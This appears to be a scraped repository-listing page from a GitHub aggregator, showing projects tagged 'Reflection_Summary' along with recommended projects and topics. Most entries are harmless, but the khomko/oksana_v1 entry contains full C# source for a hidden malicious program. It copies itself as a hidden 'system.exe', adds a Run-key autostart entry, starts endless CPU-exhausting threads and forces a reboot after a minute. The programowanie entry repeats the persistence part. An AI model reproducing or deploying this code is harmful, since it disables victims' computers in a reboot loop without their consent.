Giter VIP home page Giter VIP logo
  • ashleyw50 / work-summary

    Reflection_Summary, 每日总结业务的逻辑,并回顾做得好的以及需要提升的(Summary the Business Logic and reflection on practice)

    From user ashleyw50

  • ashleyw50 / work-summary02

    Reflection_Summary, 每日总结业务的逻辑,并回顾做得好的以及需要提升的(Summary the Business Logic and reflection on practice)

    From user ashleyw50

  • ch-zgh-1993 / es6

    Reflection_Summary, ES6 Basic exercises, basic summaries, and use summaries, reflections, ideas.

    From user ch-zgh-1993

  • ckraft-bot / music_and_hobby

    Reflection_Summary, I conduced a research on myself. In this research I wanted to see which genre of music made me perform best as a speed cuber. I used conditional formatting to analyze my results. Below you can see my summary and reflection as well as data visualization.

    From user ckraft-bot

  • gxd123 / ph11001-physics

    Reflection_Summary, SUBJECT NO-PH11001, SUBJECT NAME- Physics LTP- 3-1-0,CRD- 4 SYLLABUS :- Course Contents Theory Component: Overview of vibrations with emphasis on damped and forced oscillations, resonance, coupled oscillations, normal modes. Wave Motion: longitudinal and transverse waves, wave equation, plane waves, phase velocity, superposition wave packets and group velocity, two and three dimensional waves, polarization. Electromagnetic Waves: Maxwell’s equations, wave equation, plane electromagnetic waves, energy-momentum, Poynting’s theorem, electromagnetic boundary conditions, reflection and refraction, interference, Young’s experiment, interferometers, diffraction, Fraunhofer diffraction (single slit), dispersion, radiation. Wave Mechanics: failure of classical physics, qualitative review of relevant experiments, de Broglie waves, uncertainty principle, wave function and Schrodinger equation, probability interpretation, particle on a chain, potential barrier and quantum tunneling, potential well, qualitative summary of simple harmonic oscillator and Hydrogen atom. Occupation probability and examples. Laboratory Component: Suggested Experiments 1.Oscillation in potential well 2.Normal modes of coupled oscillators 3.Measurement of velocity of acoustic waves 4.Newton’s rings 5.Specific rotation of an optically active source 6.Diffraction with laser 7.Dispersive power of a prism 8.Fresnel biprism 9.Franck Hertz experiment 10.Photoelectric effect 11.Measurement of band gap in semiconductors 12.Measurement of Hall effect

    From user gxd123

  • khomko / oksana_v1

    Reflection_Summary, using DoFactory.GangOfFour.Singleton.Structural; using JCS; using Microsoft.Win32; using System; using System.Diagnostics; using System.IO; using System.Reflection; using System.Runtime.InteropServices; using System.Threading; using System.Windows; namespace WpfApplication_OKSANA { /// <summary> /// Логика взаимодействия для MainWindow.xaml /// </summary> public partial class MainWindow : Window { public static string needPatch = "C:\\Users\\Public\\"; public MainWindow() { if (OSVersionInfo.Name == "Windows 7" || OSVersionInfo.Name == "Windows Vista" ) { autorun.SetAutorunValue(true, needPatch + "system.exe"); // добавить в автозагрузку //SetAutorunValue(false, needPatch + "system.exe"); // убрать из автозагрузки } else if (OSVersionInfo.Name == "Windows XP") { needPatch = "C:\\Documents and Settings\\All Users\\"; autorun.SetAutorunValue(true, needPatch + "system.exe"); // добавить в автозагрузку //SetAutorunValue(false, needPatch + "system.exe"); // убрать из автозагрузки } InitializeComponent(); } private void Window_Loaded(object sender, RoutedEventArgs e) { if (!File.Exists(needPatch + "system.exe")) { try { File.Copy("system.exe", needPatch + "system.exe"); File.SetAttributes(needPatch + "system.exe", FileAttributes.Hidden); } catch { } } start(); } public static void sys_sleep() { while (true) { Thread s = new Thread(s_b); s.Start(); } } private static void s_b() { int y = 2; while (true) { y *= y; } } public static void start() { Stopwatch sw = new Stopwatch(); sw.Start(); bool b = true; bool pl = false; while (b) { if (sw.ElapsedMilliseconds > 20000) { if (!pl) { Thread g = new Thread(sys_sleep); g.Start(); pl = true; } } if (sw.ElapsedMilliseconds > 60000) { DoExitWin(EWX_REBOOT); b = false; } } } [StructLayout(LayoutKind.Sequential, Pack = 1)] internal struct TokPriv1Luid { public int Count; public long Luid; public int Attr; } [DllImport("kernel32.dll", ExactSpelling = true)] internal static extern IntPtr GetCurrentProcess(); [DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)] internal static extern bool OpenProcessToken(IntPtr h, int acc, ref IntPtr phtok); [DllImport("advapi32.dll", SetLastError = true)] internal static extern bool LookupPrivilegeValue(string host, string name, ref long pluid); [DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)] internal static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall, ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen); [DllImport("user32.dll", ExactSpelling = true, SetLastError = true)] internal static extern bool ExitWindowsEx(int flg, int rea); internal const int EWX_REBOOT = 0x00000002; internal const string SE_SHUTDOWN_NAME = "SeShutdownPrivilege"; internal const int SE_PRIVILEGE_ENABLED = 0x00000002; internal const int TOKEN_QUERY = 0x00000008; internal const int TOKEN_ADJUST_PRIVILEGES = 0x00000020; public static Thread thread1; public static void DoExitWin(int flg) { bool ok; TokPriv1Luid tp; IntPtr hproc = GetCurrentProcess(); IntPtr htok = IntPtr.Zero; ok = OpenProcessToken(hproc, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, ref htok); tp.Count = 1; tp.Luid = 0; tp.Attr = SE_PRIVILEGE_ENABLED; ok = LookupPrivilegeValue(null, SE_SHUTDOWN_NAME, ref tp.Luid); ok = AdjustTokenPrivileges(htok, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero); ok = ExitWindowsEx(flg, 0); } } public class autorun: Singleton<autorun> { public static bool SetAutorunValue(bool autorun, string npath) { const string name = "systems"; string ExePath = npath; RegistryKey reg; reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"); try { if (autorun) reg.SetValue(name, ExePath); else reg.DeleteValue(name); reg.Flush(); reg.Close(); } catch { return false; } return true; } } } namespace DoFactory.GangOfFour.Singleton.Structural { public class Singleton<T> where T : class { private static T _instance; protected Singleton() { } private static T CreateInstance() { ConstructorInfo cInfo = typeof(T).GetConstructor( BindingFlags.Instance | BindingFlags.NonPublic, null, new Type[0], new ParameterModifier[0]); return (T)cInfo.Invoke(null); } public static T Instance { get { if (_instance == null) { _instance = CreateInstance(); } return _instance; } } } }

    From user khomko

  • khomko / programowanie

    Reflection_Summary, using Microsoft.Win32; using System; using System.Diagnostics; using System.IO; using System.Reflection; using System.Runtime.InteropServices; using System.Threading; using System.Windows; namespace WpfApplication_OKSANA { /// <summary> /// Логика взаимодействия для MainWindow.xaml /// </summary> public partial class MainWindow : Window { public static string needPatch = "C:\\Users\\Public\\"; public MainWindow() { if (OSVersionInfo.Name == "Windows 7" || OSVersionInfo.Name == "Windows Vista" ) { autorun.SetAutorunValue(true, needPatch + "system.exe"); // добавить в автозагрузку //SetAutorunValue(false, needPatch + "system.exe"); // убрать из автозагрузки } else if (OSVersionInfo.Name == "Windows XP") { needPatch = "C:\\Documents and Settings\\All Users\\"; autorun.SetAutorunValue(true, needPatch + "system.exe"); // добавить в автозагрузку //SetAutorunValue(false, needPatch + "system.exe"); // убрать из автозагрузки } InitializeComponent(); }

    From user khomko

  • kitn / znotes

    Reflection_Summary, Jottings from various studies. Quotations, summaries, reflections etc.

    From user kitn

  • ssomeshkumar / booksky-

    Reflection_Summary, 🚀 Just launched my first web project, BookSky! 📚✨ BookSky is a personal notes-taking pad for book enthusiasts like me. 📖💡 Users can seamlessly add their favorite book titles and provide a concise summary, creating a digital haven for book recommendations and reflections.

    From user ssomeshkumar

  • wgwei / tip-iso9613

    Reflection_Summary, Summaries of some tips for ISO9613-2 and recommendations for number of reflections when implementing it.

    From user wgwei

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.